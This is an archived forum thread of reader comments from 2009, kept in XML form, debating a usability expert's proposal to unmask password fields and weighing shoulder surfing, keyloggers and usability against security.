	<htmltext><p>It sounds like this guy is such an "expert" in his narrow field that he's missed the forest for the trees.</p><p>Your fuel efficiency analogy is perfect, because a fuel efficiency expert giving the advice above is exactly right: you'd get maximum fuel efficiency by leaving your car off, in neutral, and pushing it everywhere.  Of course, this completely misses that the point of having a car in the first place is to go long distances much more quickly than walking, and in more comfort, but if all you're going to focus on is fuel efficiency without worrying about any other parameters, then that's the conclusion you'd come to.</p><p>This usability moron has done the same thing.  He's forgotten that security and usability are diametrically opposed; if people were that interested in ultimate usability, they'd eliminate all security measures, including passwords, because they make things harder for the user.  But having your identity stolen isn't much fun, so most people are happy to give up some usability in the interest of maintaining security.</p></htmltext>
<tokenext>It sounds like this guy is such an " expert " in his narrow field that he 's missed the forest for the trees.Your fuel efficiency analogy is perfect , because a fuel efficiency expert giving the advice above is exactly right : you 'd get maximum fuel efficiency by leaving your car off , in neutral , and pushing it everywhere .
Of course , this completely misses that the point of having a car in the first place is to go long distances much more quickly than walking , and in more comfort , but if all you 're going to focus on is fuel efficiency without worrying about any other parameters , then that 's the conclusion you 'd come to.This usability moron has done the same thing .
He 's forgotten that security and usability are diametrically opposed ; if people were that interested in ultimate usability , they 'd eliminate all security measures , including passwords , because they make things harder for the user .
But having your identity stolen is n't much fun , so most people are happy to give up some usability in the interest of maintaining security .</tokentext>
<sentencetext>It sounds like this guy is such an "expert" in his narrow field that he's missed the forest for the trees.Your fuel efficiency analogy is perfect, because a fuel efficiency expert giving the advice above is exactly right: you'd get maximum fuel efficiency by leaving your car off, in neutral, and pushing it everywhere.
Of course, this completely misses that the point of having a car in the first place is to go long distances much more quickly than walking, and in more comfort, but if all you're going to focus on is fuel efficiency without worrying about any other parameters, then that's the conclusion you'd come to.This usability moron has done the same thing.
He's forgotten that security and usability are diametrically opposed; if people were that interested in ultimate usability, they'd eliminate all security measures, including passwords, because they make things harder for the user.
But having your identity stolen isn't much fun, so most people are happy to give up some usability in the interest of maintaining security.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470865</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28475323</id>
	<title>Re:hunter2</title>
	<author>Anonymous</author>
	<datestamp>1245936540000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>However this is Stephen Hawking talking about Biology. Something which is somewhat related to his actual field, but not actually what he studied.</p></htmltext>
<tokenext>However this is Stephen Hawking talking about Biology .
Something which is somewhat related to his actual field , but not actually what he studied .</tokentext>
<sentencetext>However this is Stephen Hawking talking about Biology.
Something which is somewhat related to his actual field, but not actually what he studied.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471605</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470971</id>
	<title>Only when registering</title>
	<author>basementman</author>
	<datestamp>1245963240000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>IMHO passwords should be fully visible when a user is either changing their password, or registering a new account. This means we no longer need to confirm passwords twice when registering. And it still cuts down on the number of times when a password is visible and vulnerable to other people.</p></htmltext>
<tokenext>IMHO passwords should be fully visible when a user is either changing their password , or registering a new account .
This means we no longer need to confirm passwords twice when registering .
And it still cuts down on the number of times when a password is visible and vulnerable to other people .</tokentext>
<sentencetext>IMHO passwords should be fully visible when a user is either changing their password, or registering a new account.
This means we no longer need to confirm passwords twice when registering.
And it still cuts down on the number of times when a password is visible and vulnerable to other people.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471159</id>
	<title>Re:Easy solution</title>
	<author>gad\_zuki!</author>
	<datestamp>1245920700000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>When I was 10 or 11 years old and my parents got me a 1200 baud modem for my Apple//e I managed to  dial up a BBS and was asked for the first time to make a username and password.  I dont remember the username, but I do remember seeing *'s come out as I typed, got confused, so I just made my password ******.  Ta da! Problem solved.</p></htmltext>
<tokenext>When I was 10 or 11 years old and my parents got me a 1200 baud modem for my Apple//e I managed to dial up a BBS and was asked for the first time to make a username and password .
I dont remember the username , but I do remember seeing * 's come out as I typed , got confused , so I just made my password * * * * * * .
Ta da !
Problem solved .</tokentext>
<sentencetext>When I was 10 or 11 years old and my parents got me a 1200 baud modem for my Apple//e I managed to  dial up a BBS and was asked for the first time to make a username and password.
I dont remember the username, but I do remember seeing *'s come out as I typed, got confused, so I just made my password ******.
Ta da!
Problem solved.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470979</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28477551</id>
	<title>it works not only for passwords</title>
	<author>sigxcpu</author>
	<datestamp>1245951960000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>***-*** *</p></htmltext>
<tokenext>* * * - * * * *</tokentext>
<sentencetext>***-*** *</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471255</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471053</id>
	<title>Re:Two words</title>
	<author>ByOhTek</author>
	<datestamp>1245920400000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>It's more like having a comfort specialist (yes, they don't exist, you can figure out what such a person would be from the name) tell you to roll down your windows for cooling when going on the freeway (you are moving faster! more cooling) but using AC on the side streets (not like the windows will cool you much). He then adds that the fuel economy of the car won't be impacted much, so why not?</p><p>The thing is, this guy is a <b>usability</b> expert, not a <b>security</b> expert. He only has a clue for about half of what he is talking about, and doesn't seem interested in the rest.</p></htmltext>
<tokenext>It 's more like having a comfort specialist ( yes , they do n't exist , you can figure out what such a person would be from the name ) tell you to roll down your windows for cooling when going on the freeway ( you are moving faster !
more cooling ) but using AC on the side streets ( not like the windows will cool you much ) .
He then adds that the fuel economy of the car wo n't be impacted much , so why not ? The thing is , this guy is a usability expert , not a security expert .
He only has a clue for about half of what he is talking about , and does n't seem interested in the rest .</tokentext>
<sentencetext>It's more like having a comfort specialist (yes, they don't exist, you can figure out what such a person would be from the name) tell you to roll down your windows for cooling when going on the freeway (you are moving faster!
more cooling) but using AC on the side streets (not like the windows will cool you much).
He then adds that the fuel economy of the car won't be impacted much, so why not?The thing is, this guy is a usability expert, not a security expert.
He only has a clue for about half of what he is talking about, and doesn't seem interested in the rest.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470865</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471581</id>
	<title>"Usability Expert"?</title>
	<author>Anonymous</author>
	<datestamp>1245922020000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>That has never seen Lotus Notes?  There are plenty of ways to increase user feedback without showing their password to the world.  There is also absolutely no evidence that a mistyped password causes a user to not attempt again.  How high could the typo rate be a person's password?</p><p>I did a project where keystroke timing was used in addition to characters to create a password.  This caused a failure rate in users of around 75\%.  For the 3 months that I had it up nobody didn't try until they succeeded.  I must be right.</p><p>Seriously, do you close your bank account because you can't type your password right?</p></htmltext>
<tokenext>That has never seen Lotus Notes ?
There are plenty of ways to increase user feedback without showing their password to the world .
There is also absolutely no evidence that a mistyped password causes a user to not attempt again .
How high could the typo rate be a person 's password ? I did a project where keystroke timing was used in addition to characters to create a password .
This caused a failure rate in users of around 75 \ % .
For the 3 months that I had it up nobody did n't try until they succeeded .
I must be right.Seriously , do you close your bank account because you ca n't type your password right ?</tokentext>
<sentencetext>That has never seen Lotus Notes?
There are plenty of ways to increase user feedback without showing their password to the world.
There is also absolutely no evidence that a mistyped password causes a user to not attempt again.
How high could the typo rate be a person's password?I did a project where keystroke timing was used in addition to characters to create a password.
This caused a failure rate in users of around 75\%.
For the 3 months that I had it up nobody didn't try until they succeeded.
I must be right.Seriously, do you close your bank account because you can't type your password right?</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472895</id>
	<title>Re:Indeed lack of imagination</title>
	<author>2short</author>
	<datestamp>1245926340000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext>"1) If I look outside my office window, I can see about 48 office windows (without standing up) and all of them have the lights on and it's dusk outside. Give me a dSLR and a decent set of long distance lenses and I'll prove you wrong."<br><br>Give me the same equipment, and I'll take the passwords off the keyboards.<br><br>"2) How many times have you typed in your password while somebody was looking at your screen"<br>"3) How many times have you given a presentation where your screen view (but not your keyboard input) goes worldwide"<br><br>Not all that often.  In any case, the suggestion is to make obscuring the password optional.  There are case where obscuring it makes sense.  There are cases where obscuring it is a PITA.  I, the user, know which case applies.<br><br>"4) How difficult is it to create a script that takes screenshots - how difficult is it to create a script that captures keyboard entry as well."<br>I'm not convinced you're right about the relative difficulty of capturing screen-shots vs keyboard input.  In any case, if we assume the attacker has access to the machine, obscuring password displays seems like locking the door after the horse has fled and walls of the stable have been dismantled.</htmltext>
<tokenext>" 1 ) If I look outside my office window , I can see about 48 office windows ( without standing up ) and all of them have the lights on and it 's dusk outside .
Give me a dSLR and a decent set of long distance lenses and I 'll prove you wrong .
" Give me the same equipment , and I 'll take the passwords off the keyboards .
" 2 ) How many times have you typed in your password while somebody was looking at your screen " " 3 ) How many times have you given a presentation where your screen view ( but not your keyboard input ) goes worldwide " Not all that often .
In any case , the suggestion is to make obscuring the password optional .
There are case where obscuring it makes sense .
There are cases where obscuring it is a PITA .
I , the user , know which case applies .
" 4 ) How difficult is it to create a script that takes screenshots - how difficult is it to create a script that captures keyboard entry as well .
" I 'm not convinced you 're right about the relative difficulty of capturing screen-shots vs keyboard input .
In any case , if we assume the attacker has access to the machine , obscuring password displays seems like locking the door after the horse has fled and walls of the stable have been dismantled .</tokentext>
<sentencetext>"1) If I look outside my office window, I can see about 48 office windows (without standing up) and all of them have the lights on and it's dusk outside.
Give me a dSLR and a decent set of long distance lenses and I'll prove you wrong.
"Give me the same equipment, and I'll take the passwords off the keyboards.
"2) How many times have you typed in your password while somebody was looking at your screen""3) How many times have you given a presentation where your screen view (but not your keyboard input) goes worldwide"Not all that often.
In any case, the suggestion is to make obscuring the password optional.
There are case where obscuring it makes sense.
There are cases where obscuring it is a PITA.
I, the user, know which case applies.
"4) How difficult is it to create a script that takes screenshots - how difficult is it to create a script that captures keyboard entry as well.
"I'm not convinced you're right about the relative difficulty of capturing screen-shots vs keyboard input.
In any case, if we assume the attacker has access to the machine, obscuring password displays seems like locking the door after the horse has fled and walls of the stable have been dismantled.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471099</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28474693</id>
	<title>Re:Two words</title>
	<author>BenoitRen</author>
	<datestamp>1245933600000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><blockquote><div><p>Offering a default to turn OFF password masking for bank accounts?</p></div> </blockquote><p>Read his paragraph again. He's offering to have passwords masked by default for high-risk things like bank accounts. CHECKED = MASK ON</p></div>
	</htmltext>
<tokenext>Offering a default to turn OFF password masking for bank accounts ?
Read his paragraph again .
He 's offering to have passwords masked by default for high-risk things like bank accounts .
CHECKED = MASK ON</tokentext>
<sentencetext>Offering a default to turn OFF password masking for bank accounts?
Read his paragraph again.
He's offering to have passwords masked by default for high-risk things like bank accounts.
CHECKED = MASK ON
	</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471013</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28474083</id>
	<title>Whuut?</title>
	<author>Anonymous</author>
	<datestamp>1245931440000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>I wish I could mask my username and password to tell you the truth.  I have so many people that have a tendency to float around me whenever I need to login to anything.  Seriously, this guy is off his rocker.</p></htmltext>
<tokenext>I wish I could mask my username and password to tell you the truth .
I have so many people that have a tendency to float around me whenever I need to login to anything .
Seriously , this guy is off his rocker .</tokentext>
<sentencetext>I wish I could mask my username and password to tell you the truth.
I have so many people that have a tendency to float around me whenever I need to login to anything.
Seriously, this guy is off his rocker.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28480067</id>
	<title>Re:its not a problem for me</title>
	<author>Linker3000</author>
	<datestamp>1246019880000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>That's OK, even though you saw "fluffybunnies" because it's your password, all we saw on our screens was "*************"</p><p>No need to panic</p></htmltext>
<tokenext>That 's OK , even though you saw " fluffybunnies " because it 's your password , all we saw on our screens was " * * * * * * * * * * * * * " No need to panic</tokentext>
<sentencetext>That's OK, even though you saw "fluffybunnies" because it's your password, all we saw on our screens was "*************"No need to panic</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471349</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471141</id>
	<title>Re:hunter2</title>
	<author>ls671</author>
	<datestamp>1245920640000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>Keyboard sniffers (especially software ones) are a lot easier to install than cameras by remote attackers, I guess the guy has got a point !</p></htmltext>
<tokenext>Keyboard sniffers ( especially software ones ) are a lot easier to install than cameras by remote attackers , I guess the guy has got a point !</tokentext>
<sentencetext>Keyboard sniffers (especially software ones) are a lot easier to install than cameras by remote attackers, I guess the guy has got a point !</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470839</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28475981</id>
	<title>Who cares</title>
	<author>$pace6host</author>
	<datestamp>1245940200000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext>Who cares if someone sees my password, the HR people in Bozeman already know it!</htmltext>
<tokenext>Who cares if someone sees my password , the HR people in Bozeman already know it !</tokentext>
<sentencetext>Who cares if someone sees my password, the HR people in Bozeman already know it!</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471485</id>
	<title>Wrong</title>
	<author>pubwvj</author>
	<datestamp>1245921720000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext>Generally I agree with him but not this time. I don't want someone looking over my shoulder and seeing my password. I touch type very fast. I don't need to see the passwords and I certainly don't need other people seeing them.</htmltext>
<tokenext>Generally I agree with him but not this time .
I do n't want someone looking over my shoulder and seeing my password .
I touch type very fast .
I do n't need to see the passwords and I certainly do n't need other people seeing them .</tokentext>
<sentencetext>Generally I agree with him but not this time.
I don't want someone looking over my shoulder and seeing my password.
I touch type very fast.
I don't need to see the passwords and I certainly don't need other people seeing them.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472063</id>
	<title>Re:Not to fanboi all over the place...</title>
	<author>jeff4747</author>
	<datestamp>1245923400000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>You do realize that this provides pretty much no protection at all from shoulder-surfing, right?  The surfer can read the characters since they're displayed non-bulleted.</p><p>If the characters are non-bulleted at any point, then there's no reason to bother bulleting them.</p><p>Given the typical error rate on a smart phone virtual keyboard, it's probably better to rely on the user obscuring the screen itself.</p></htmltext>
<tokenext>You do realize that this provides pretty much no protection at all from shoulder-surfing , right ?
The surfer can read the characters since they 're displayed non-bulleted.If the characters are non-bulleted at any point , then there 's no reason to bother bulleting them.Given the typical error rate on a smart phone virtual keyboard , it 's probably better to rely on the user obscuring the screen itself .</tokentext>
<sentencetext>You do realize that this provides pretty much no protection at all from shoulder-surfing, right?
The surfer can read the characters since they're displayed non-bulleted.If the characters are non-bulleted at any point, then there's no reason to bother bulleting them.Given the typical error rate on a smart phone virtual keyboard, it's probably better to rely on the user obscuring the screen itself.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470909</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28476009</id>
	<title>The answer to the question is</title>
	<author>Anonymous</author>
	<datestamp>1245940380000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>No.</p></htmltext>
<tokenext>No .</tokentext>
<sentencetext>No.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471175</id>
	<title>Browsers can solve this</title>
	<author>basketcase</author>
	<datestamp>1245920700000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>Since we are talking about web logins here there is a simple solution...</p><p>Most modern web browsers support remembering passwords and typing them in for you.  If you are so unconcerned about security that you want your password to be displayed on the screen for anyone to see then you may as well just let your browser type it in for you and eliminate the typo problem completely.</p></htmltext>
<tokenext>Since we are talking about web logins here there is a simple solution...Most modern web browsers support remembering passwords and typing them in for you .
If you are so unconcerned about security that you want your password to be displayed on the screen for anyone to see then you may as well just let your browser type it in for you and eliminate the typo problem completely .</tokentext>
<sentencetext>Since we are talking about web logins here there is a simple solution...Most modern web browsers support remembering passwords and typing them in for you.
If you are so unconcerned about security that you want your password to be displayed on the screen for anyone to see then you may as well just let your browser type it in for you and eliminate the typo problem completely.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471443</id>
	<title>stupidest idea ever</title>
	<author>Anonymous</author>
	<datestamp>1245921540000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>What about when web forms fill in the password for you???</p><p>I know that isn't secure, and they could log in there anyway. But if people can go to my yahoo when I'm not at my computer and see my password, then they could log in sometime later. I'd never know, no danger at being caught. Plus most people use the same few passwords over and over.</p><p>Not to mention the trouble you could get into with a password like "mywifeisawhore"</p><p>My Nielsen, you should use the internet before you come up with such ridiculous ideas.</p></htmltext>
<tokenext>What about when web forms fill in the password for you ? ?
? I know that is n't secure , and they could log in there anyway .
But if people can go to my yahoo when I 'm not at my computer and see my password , then they could log in sometime later .
I 'd never know , no danger at being caught .
Plus most people use the same few passwords over and over.Not to mention the trouble you could get into with a password like " mywifeisawhore " My Nielsen , you should use the internet before you come up with such ridiculous ideas .</tokentext>
<sentencetext>What about when web forms fill in the password for you??
?I know that isn't secure, and they could log in there anyway.
But if people can go to my yahoo when I'm not at my computer and see my password, then they could log in sometime later.
I'd never know, no danger at being caught.
Plus most people use the same few passwords over and over.Not to mention the trouble you could get into with a password like "mywifeisawhore"My Nielsen, you should use the internet before you come up with such ridiculous ideas.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28487211</id>
	<title>Re:hunter2</title>
	<author>Anonymous</author>
	<datestamp>1246049400000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p><div class="quote"><p>If Stephen Hawking says something about physics, do you require a citation from him? Nielson is recognized as one of the leading experts in his field.</p></div><p><div class="quote"><p>He's not a security expert, but he IS a useability expert (even though I</p></div><p><div class="quote"><p>He's not a security expert</p> </div><p><div class="quote"><p>not a security expert</p></div><p>If I have a plumber telling me that typically, masking passwords doesn't even increase security, yes, I'd want a citation.</p></div>
	</htmltext>
<tokenext>If Stephen Hawking says something about physics , do you require a citation from him ?
Nielson is recognized as one of the leading experts in his field.He 's not a security expert , but he IS a useability expert ( even though IHe 's not a security expert not a security expertIf I have a plumber telling me that typically , masking passwords does n't even increase security , yes , I 'd want a citation .</tokentext>
<sentencetext>If Stephen Hawking says something about physics, do you require a citation from him?
Nielson is recognized as one of the leading experts in his field.He's not a security expert, but he IS a useability expert (even though IHe's not a security expert not a security expertIf I have a plumber telling me that typically, masking passwords doesn't even increase security, yes, I'd want a citation.
	</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471283</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471789</id>
	<title>Re:Two words</title>
	<author>plague3106</author>
	<datestamp>1245922620000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>I hear they have these pieces of glass built into walls now in which light may freely pass...</p></htmltext>
<tokenext>I hear they have these pieces of glass built into walls now in which light may freely pass.. .</tokentext>
<sentencetext>I hear they have these pieces of glass built into walls now in which light may freely pass...</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471191</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471133</id>
	<title>Re:Two words</title>
	<author>dkleinsc</author>
	<datestamp>1245920640000</datestamp>
	<modclass>Insightful</modclass>
	<modscore>2</modscore>
	<htmltext><p>expert(n): Someone who will charge you a large amount of money to state the obvious (possibly to someone else who needs to be convinced of something).</p><p>The real geniuses of the world don't go around calling themselves "experts", they just do nifty things and solve interesting and difficult problems.</p></htmltext>
<tokenext>expert ( n ) : Someone who will charge you a large amount of money to state the obvious ( possibly to someone else who needs to be convinced of something ) .The real geniuses of the world do n't go around calling themselves " experts " , they just do nifty things and solve interesting and difficult problems .</tokentext>
<sentencetext>expert(n): Someone who will charge you a large amount of money to state the obvious (possibly to someone else who needs to be convinced of something).The real geniuses of the world don't go around calling themselves "experts", they just do nifty things and solve interesting and difficult problems.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470865</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471403</id>
	<title>Re:Masking passwords doesn't do much</title>
	<author>Anonymous</author>
	<datestamp>1245921480000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext>You make a fine point. I would like however to point out that masked passwords are useful for preventing the non tech savy jerk across the cubicle from logging into your account. Yes a super hacker will not be stopped by a masked password, but 99\%+ of the office populous are not comprised (in most normal situations) of anyone capable of what you describe asides from possibly the IT staff. Most of your shoulder surfers are comprised of people that have issues getting their power point presentations to work.</htmltext>
<tokenext>You make a fine point .
I would like however to point out that masked passwords are useful for preventing the non tech savy jerk across the cubicle from logging into your account .
Yes a super hacker will not be stopped by a masked password , but 99 \ % + of the office populous are not comprised ( in most normal situations ) of anyone capable of what you describe asides from possibly the IT staff .
Most of your shoulder surfers are comprised of people that have issues getting their power point presentations to work .</tokentext>
<sentencetext>You make a fine point.
I would like however to point out that masked passwords are useful for preventing the non tech savy jerk across the cubicle from logging into your account.
Yes a super hacker will not be stopped by a masked password, but 99\%+ of the office populous are not comprised (in most normal situations) of anyone capable of what you describe asides from possibly the IT staff.
Most of your shoulder surfers are comprised of people that have issues getting their power point presentations to work.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471057</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28475893</id>
	<title>Having a checkbox is usable?</title>
	<author>Anonymous</author>
	<datestamp>1245939660000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>So, instead of having a simple password field, we now have a checkbox that changes the functionality of the password field based on its state.</p><p>Is that not complex? Is simplicity not a factor in usability anymore?</p></htmltext>
<tokenext>So , instead of having a simple password field , we now have a checkbox that changes the functionality of the password field based on its state.Is that not complex ?
Is simplicity not a factor in usability anymore ?</tokentext>
<sentencetext>So, instead of having a simple password field, we now have a checkbox that changes the functionality of the password field based on its state.Is that not complex?
Is simplicity not a factor in usability anymore?</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471747</id>
	<title>Re:Two words</title>
	<author>TheSeventh</author>
	<datestamp>1245922560000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext>
After RTFA, this is a cranky old guy that can't use mobile phone keyboards, is always sitting alone in his office, can't avoid accidentally pressing the reset button if it's on the page, and also can't type fast enough to prevent someone from watching all the keys he presses when he types anyway.
<br> <br>
I'd just like to say to him, "Get off my lawn."</htmltext>
<tokenext>After RTFA , this is a cranky old guy that ca n't use mobile phone keyboards , is always sitting alone in his office , ca n't avoid accidentally pressing the reset button if it 's on the page , and also ca n't type fast enough to prevent someone from watching all the keys he presses when he types anyway .
I 'd just like to say to him , " Get off my lawn .
"</tokentext>
<sentencetext>
After RTFA, this is a cranky old guy that can't use mobile phone keyboards, is always sitting alone in his office, can't avoid accidentally pressing the reset button if it's on the page, and also can't type fast enough to prevent someone from watching all the keys he presses when he types anyway.
I'd just like to say to him, "Get off my lawn.
"</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471013</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28475931</id>
	<title>Nielsen Recommends Learning How To Type</title>
	<author>Yeorwned</author>
	<datestamp>1245939900000</datestamp>
	<modclass>None</modclass>
	<modscore>-1</modscore>
	<htmltext>...while they are saving the Internet, maybe a practice typing test on each password screen so users can learn how to type since the whole password business is so difficult.</htmltext>
<tokenext>...while they are saving the Internet , maybe a practice typing test on each password screen so users can learn how to type since the whole password business is so difficult .</tokentext>
<sentencetext>...while they are saving the Internet, maybe a practice typing test on each password screen so users can learn how to type since the whole password business is so difficult.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28475687</id>
	<title>Oh you don't like that?</title>
	<author>atramentum</author>
	<datestamp>1245938580000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext>Then use your goddamned fingerprint reader.

Seriously though, I like this guy.  His arguments are clear and they make sense.  This isn't pitting security against usability at all, because masking isn't secure anyway.

One omitted fact is that client scripts can capture your input on these fields, which could be a security hole.  I'd like to see a password textbox that is inaccessible by client script, but visible in clear text.  I would bet that out of all the websites you/I use, there are many that don't protect against XSS.</htmltext>
<tokenext>Then use your goddamned fingerprint reader .
Seriously though , I like this guy .
His arguments are clear and they make sense .
This is n't pitting security against usability at all , because masking is n't secure anyway .
One omitted fact is that client scripts can capture your input on these fields , which could be a security hole .
I 'd like to see a password textbox that is inaccessible by client script , but visible in clear text .
I would bet that out of all the websites you/I use , there are many that do n't protect against XSS .</tokentext>
<sentencetext>Then use your goddamned fingerprint reader.
Seriously though, I like this guy.
His arguments are clear and they make sense.
This isn't pitting security against usability at all, because masking isn't secure anyway.
One omitted fact is that client scripts can capture your input on these fields, which could be a security hole.
I'd like to see a password textbox that is inaccessible by client script, but visible in clear text.
I would bet that out of all the websites you/I use, there are many that don't protect against XSS.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28474675</id>
	<title>Re:hunter2</title>
	<author>Anonymous</author>
	<datestamp>1245933540000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p><div class="quote"><p>If someone can't remember 6-8 characters with a number thrown in there for good measure, perhaps they should not be on the internet.</p></div><p>Especially given that muscle memory will kick in after the first 3-4 times you have to enter it making the password entry process more or less subconscious.  Trick is to log out and in several times a day when you first get a new password to expedite the process.</p></div>
	</htmltext>
<tokenext>If someone ca n't remember 6-8 characters with a number thrown in there for good measure , perhaps they should not be on the internet.Especially given that muscle memory will kick in after the first 3-4 times you have to enter it making the password entry process more or less subconscious .
Trick is to log out and in several times a day when you first get a new password to expedite the process .</tokentext>
<sentencetext>If someone can't remember 6-8 characters with a number thrown in there for good measure, perhaps they should not be on the internet.Especially given that muscle memory will kick in after the first 3-4 times you have to enter it making the password entry process more or less subconscious.
Trick is to log out and in several times a day when you first get a new password to expedite the process.
	</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471313</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28474091</id>
	<title>Security context</title>
	<author>Requiem18th</author>
	<datestamp>1245931500000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
